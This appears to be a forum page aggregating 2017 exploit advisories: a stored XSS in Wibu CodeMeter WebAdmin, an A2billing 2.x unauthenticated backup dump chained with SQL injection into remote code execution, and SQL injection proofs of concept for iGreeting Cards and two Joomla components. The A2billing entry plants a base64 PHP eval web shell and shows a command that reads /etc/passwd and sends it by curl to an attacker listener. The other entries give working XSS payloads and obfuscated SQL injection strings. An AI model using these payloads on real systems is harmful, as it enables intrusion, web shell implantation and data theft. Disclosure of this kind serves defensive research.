(Wibu Systems AG - Security Department) 2017-08-01: Vendor Fix/Patch (Wibu Systems AG - Service Developer Team) 2017-08-20: Security Acknowledgements (Wibu Systems AG - Security Department) 2017-09-04: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Wibu-Systems AG Product: CodeMeter & Control Panel - WebAdmin (Web-Application) 6.50.2624.500 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A persistent input validation vulnerability has been discovered in the Wibu Systems AG CodeMeter WebAdmin v6.50 web-server web-application. The vulnerability allows remote attackers to inject own malicious script code with application-side vector to the vulnerable function or module to followup with a compromising attack. The input validation vulnerability has been discovered in the `server name` input field of the `advanced settings - time server` module. The request method to inject is POST and the attack vector is located on the application-side. First the attacker injects the payload and after it the POST request is performed to save the content permanently. After that the issue triggers on each visit an execution. The basic validation in the application is well setup but in case of the advanced settings the validation parameter are still not implemented to secure the function at all. The vulnerability is a classic filter input validation vulnerability. The application has no cookies and therefore the attack risk is more minor but not that less then to ignore it. The vulnerable files are `ChangeConfiguration.html`, `time_server_list.html` and `certified_time.html`. The `ChangeConfiguration.html` is marked as injection point for the payload. The `time_server_list.html` and `certified_time.html` files are mared with the execution point of the issue. The security issue was uncovered during the blurrybox hacking contest of the wibu systems ag and acknowledged by the management. The security risk of the persistent input validation issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the persistent input validation web vulnerability requires low user interaction and a privileged web-application user account. Successful exploitation of the vulnerability results in persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected or connected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Advanced Settings - Time Server Vulnerable File(s): [+] ChangeConfiguration.html Vulnerable Parameter(s): [+] server name Affected Module(s): [+] time_server_list.html [+] certified_time.html Proof of Concept (PoC): ======================= The persistent input validation vulnerability can be exploited by remote attackers with privileged user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Start the CodeMeter software 2. Open the webadmin gui 3. Move to advanced settings 4. Open the time-server module 5. Click the plus to add a new time server Note: The request method is POST 6. Inject a test script code payload with matching domain and save via POST 7. The code is saved and executes of the dbms in the time-server list module index 8. Successful reproduce of the vulnerability! Note: The method can be automated by usage of post method requester to include a payload. PoC: Payload (Exploitation) cmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")> cmtime.codehacker.de/>"<iframe src="evil.source" onload=alert("GUTENMORGEN")> PoC: Vulnerable Source <div id="time_server_to_add"><input id="TimeServerId1" name="time_server_list_list" value="cmtime.codemeter.com" type="radio"><label class="time_server_list_list_label" for="TimeServerId1"><span class="ct100_t bld ssl_number_space">1. </span>cmtime.codemeter.com<span class="ssl_up" onclick="onClickSSLUp(this);" style="visibility: hidden;"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"> </span></span></label><input id="TimeServerId3" name="time_server_list_list" value="cmtime.codemeter.de" type="radio"> <label class="time_server_list_list_label" for="TimeServerId3"><span class="ct100_t bld ssl_number_space">2. </span>cmtime.codemeter.de <span class="ssl_up" onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label><input id="TimeServerId4" name="time_server_list_list" value="cmtime.codemeter.us" type="radio"><label class="time_server_list_list_label" for="TimeServerId4"> <span class="ct100_t bld ssl_number_space">3. </span>cmtime.codemeter.us<span class="ssl_up" onclick="onClickSSLUp(this);"> <span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);" style="visibility: visible;"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);"> <span class="fa fa-trash-o fa-list-buttons"></span></span></label><input id="cmtime.codehacker.de/>" <img="" src="evil.source">" type="radio" name="time_server_list_list" value="cmtime.codehacker.de/>"<img src="evil.source">"/><label class="time_server_list_list_label" for="cmtime.codehacker.de/>" <img="" src="evil.source">"><span id="ssl_number_cmtime.codehacker.de/>" <img="" src="evil.source">"[EXECUTABLE PAYLOAD!] class="ct100_t bld ssl_number_space"></span>cmtime.codehacker.de/>"<img src="evil.source"><span class="ssl_up" onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);" style="visibility: hidden;"><span class="fa fa-arrow-down fa-list-buttons"></span></span> <span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label></div> --- PoC Session Logs (GET) --- Status: 200[OK] POST http://localhost:22350/actions/ChangeConfiguration.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[1544] Mime Type[text/html] Request Header: Host[localhost:22350] User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0] Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] Content-Type[application/x-www-form-urlencoded] Content-Length[255] Referer[http://localhost:22350/configuration/certified_time.html] Cookie[com.wibu.cm.webadmin.lang=de-DE] Connection[keep-alive] Upgrade-Insecure-Requests[1] POST-Daten: Action[CertifiedTimeConfiguration] TimeServerList[cmtime.codemeter.com%7Ccmtime.codemeter.de%7Ccmtime.codemeter.us%7Ccmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>%7C] SoapTimeOut[20] certified_time_time_out[20] ApplyButton[Apply] WaFormGuard[v0V839tW3xkpa6jC26kYsvZJxe0UFJCl4%2FB2ipA6Xpwv] Response Header: Server[WIBU-SYSTEMS HTTP Server] Date[21 May 2017 16:00:21 +0000] Content-Type[text/html; charset=utf-8] X-Frame-Options[SAMEORIGIN] x-xss-protection[1; mode=block] Accept-Ranges[bytes] Content-Length[1544] - Status: 200[OK] GET http://localhost:22350/configuration/iframe/evil.source[PAYLOAD EXECUTION] Load Flags[LOAD_NORMAL] Größe des Inhalts[2320] Mime Type[text/html] Request Header: Host[localhost:22350] User-Agent[zero-zero] Accept[*/*] Referer[http://localhost:22350/configuration/iframe/time_server_list.html] Cookie[com.wibu.cm.webadmin.lang=de-DE] Connection[keep-alive] Response Header: Server[WIBU-SYSTEMS HTTP Server] Date[19 May 2017 21:02:23 +0000] Connection[close] Content-Type[text/html; charset=utf-8] X-Frame-Options[SAMEORIGIN] x-xss-protection[1; mode=block] Accept-Ranges[bytes] Content-Length[2320] - Status: 200[OK] GET http://localhost:22350/configuration/iframe/evil.source Mime Type[text/html] Request Header: Host[localhost:22350] User-Agent[zero-zero] Accept[*/*] Referer[http://localhost:22350/configuration/iframe/time_server_list.html] Cookie[com.wibu.cm.webadmin.lang=de-DE] Connection[keep-alive] Response Header: Server[WIBU-SYSTEMS HTTP Server] Date[19 May 2017 21:06:56 +0000] Connection[close] Content-Type[text/html; charset=utf-8] X-Frame-Options[SAMEORIGIN] x-xss-protection[1; mode=block] X-Content-Type-Options[nosniff] Accept-Ranges[bytes] Content-Length[2320] Reference(s): http://localhost:22350/ http://localhost:22350/configuration/ http://localhost:22350/configuration/ChangeConfiguration.html http://localhost:22350/configuration/certified_time.html http://localhost:22350/configuration/time_server_list.html Solution - Fix & Patch: ======================= 1. Restrict the input field and disallow the usage of special chars like in the other input fields 2. Parse the input field and escape the content 3. Parse in the visible listing the output location of the item 4. Setup a secure exception-handling to handl illegal events 5. Include a proper validation mask to the form to prevent further injection attacks The security vulnerability has been patched in the version 6.50b. Security Risk: ============== The seurity risk of the persistent input validation web vulnerability in the web-server webadmin web-application is estimated as medium (CVSS 3.5). Earlier version releases up to codemeter 6.50 may be affected as well by the cross site scripting web vulnerability. Credits & Authors: ================== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact ([email protected]) to get an ask permission. Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com
  22. # Title : A2billing 2.x , Unauthenticated Backup dump / RCE flaw # Vulnerable software : A2billing 2.x # Author : Ahmed Sultan (0x4148) # Email : [email protected] # Home : 0x4148.com # Linkedin : https://www.linkedin.com/in/0x4148/ A2billing contain multiple flaws which can be chained together to achieve shell access over the a2b instance If you're looking for deep technical stuff , check out the full writeup at https://0x4148.com/2016/10/28/a2billing-rce/ 1 . backup dump Vulnerable code File : admin/public/form_data/FG_var_backup.inc getpost_ifset(array('name','path','creationdate')); $HD_Form = new FormHandler("cc_backup","Backup"); $HD_Form -> FG_DEBUG = 0; if ($form_action!='ask-add') check_demo_mode(); if ($form_action == 'add'){ $backup_file = $path; if (substr($backup_file,-3)=='.gz'){ // WE NEED TO GZIP $backup_file = substr($backup_file,0,-3); $do_gzip=1; } // Make the backup stuff here and redirect to success page //mysqldump -all --databases mya2billing -ua2billinguser -pa2billing > /tmp/test.sql //pg_dump -c -d -U a2billinguser -h localhost -f /tmp/test.sql mya2billing if (DB_TYPE != 'postgres'){ $run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."' -p'".PASS."' > '{$backup_file}'"; }else{ $env_var="PGPASSWORD='".PASS."'"; putenv($env_var); $run_backup=PG_DUMP." -c -d -U ".USER." -h ".HOST." -f '{$backup_file}' ".DBNAME; } if ($FG_DEBUG == 1 ) echo $run_backup."<br>"; >>>> exec($run_backup,$output,$error); if ($do_gzip){ // Compress file $run_gzip = GZIP_EXE." '$backup_file'"; if ($FG_DEBUG == 1 ) echo $run_gzip."<br>"; >>>> exec($run_gzip,$output,$error_zip); } File is being called at "admin/Public/A2B_entity_backup.php" before the authentication checking proccess take place so to dump full backup we can just move to : http://HOST//a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.sql backup will be found at admin/Public/0x4148.sql few hardening is being carried out by the application which did great job preventing direct RCE flaw , so we had to figure out sth else 2 . SQL injection File name : ckeckout_process.php Line 287 : $Query = "INSERT INTO cc_payments_agent ( agent_id, agent_name, agent_email_address, item_name, item_id, item_quantity, payment_method, cc_type, cc_owner, cc_number, " . " cc_expires, orders_status, last_modified, date_purchased, orders_date_finished, orders_amount, currency, currency_value) values (" . " '".$transaction_data[0][1]."', '".$customer_info[3]." ".$customer_info[2]."', '".$customer_info["email"]."', 'balance', '". $customer_info[0]."', 1, '$pmodule', '".$_SESSION["p_cardtype"]."', '".$transaction_data[0][5]."', '".$transaction_data[0][6]."', '". $transaction_data[0][7]."', $orderStatus, '".$nowDate."', '".$nowDate."', '".$nowDate."', ".$amount_paid.", '".$currCurrency."', '". $currencyObject->get_value($currCurrency)."' )"; $result = $DBHandle_max -> Execute($Query); By exploiting this flaw we can insert malicious data into the db using the following query <thanks to i-Hmx for the great hint> transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c286261736536345f6465636f646528245f504f53545b6e61696c69745d29293b203f3e,7,8,9,10,11,12,13-//**- -&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb After sending this request the following payload "<?php eval(base64_decode($_POST[nailit])); ?>" will be injected directly into the DB 3 . RCE after injecting the malicious code we can just dump backup again but this time we will name it "0x4148.php" , so our code can be executed :) [[email protected] Public]# curl ' https://127.0.0.1/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.php' --insecure [[email protected] Public]# cat 0x4148.php | grep nailit INSERT INTO `cc_payments_agent` VALUES (295,2,' ','','balance','',1,'plugnpay','','66666666666666666666666666666666666666666666','77777777777777777777777777777777','8',-1,'3.000000','2016-10-28 10:57:10','2016-10-28 10:57:10','2016-10-28 10:57:10','usd','0.000000'),(296,2,' ','','balance','',1,'plugnpay','','<?php eval(base64_decode($_POST[nailit])); ?>','7','8',-1,'3.000000','2016-10-28 10:58:22','2016-10-28 10:58:22','2016-10-28 10:58:22','usd','0.000000'); Now just exploit it via post nailit=base64_encoded php code to admin/Public/0x4148.php for instance system(‘x=$(cat /etc/passwd);curl -d “$x” http://x.x.x.x:8000/0x4148.jnk’); will read /etc/passwd and send it to our nc listener Exploit timeline : 01/10/2016 : vulnerability reported to vendor 06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP 04/09/2017 : Public release Credits, Ahmed Sultan - Cyber Security Analyst @ EG-CERT
  23. Hacking

    # # # # # # Exploit Title: iGreeting Cards 1.0 - SQL Injection # Dork: N/A # Date: 04.09.2017 # Vendor Homepage: http://coryapp.com/ # Software Link: http://coryapp.com/?product&index # Demo: http://coryapp.com/demo/greetingcards/ # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?index&search&k=[SQL] # # eFe'+/*!11112UnIoN*/(/*!11112SelEcT*/+0x283129,VERSioN(),0x283329,0x283429,0x283529,0x283629,0x283729,0x283829)--+- # # http://localhost/[PATH]/index.php?index&index&p=[SQL] # # http://localhost/[PATH]/index.php?category&index&id=[SQL] # # Etc.. # # # # #
  24. # # # # # # Exploit Title: Joomla! Component Survey Force Deluxe 3.2.4 - SQL Injection # Dork: N/A # Date: 03.09.2017 # Vendor Homepage: http://joomplace.com/ # Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/survey-force-deluxe/ # Demo: http://demo30.joomplace.com/our-products/survey-force-deluxe # Version: 3.2.4 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/index.php?option=com_surveyforce&task=start_invited&survey=19&invite=[SQL] # # Etc.. # # # # #
  25. Hacking

    # # # # # # Exploit Title: Joomla! Component CheckList 1.1.0 - SQL Injection # Dork: N/A # Date: 03.09.2017 # Vendor Homepage: http://joomplace.com/ # Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/ # Demo: http://checklistdemo.joomplace.com/ # Version: 1.1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: N/A # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: # # http://localhost/[PATH]/[PROFILE][SQL].html # http://localhost/[PATH]/[TAG][SQL].html # http://localhost/[PATH]/[CHECKLIST][SQL].html # # our-products/checklist/checklist/tag/social'and+(SeLeCT+1+FrOM+(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast(database()+as+char),0x7e))+FrOM+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+FrOM+information_schema.tables+group+by+x)a)+AND+''='.html # # Etc.. # # # # #
×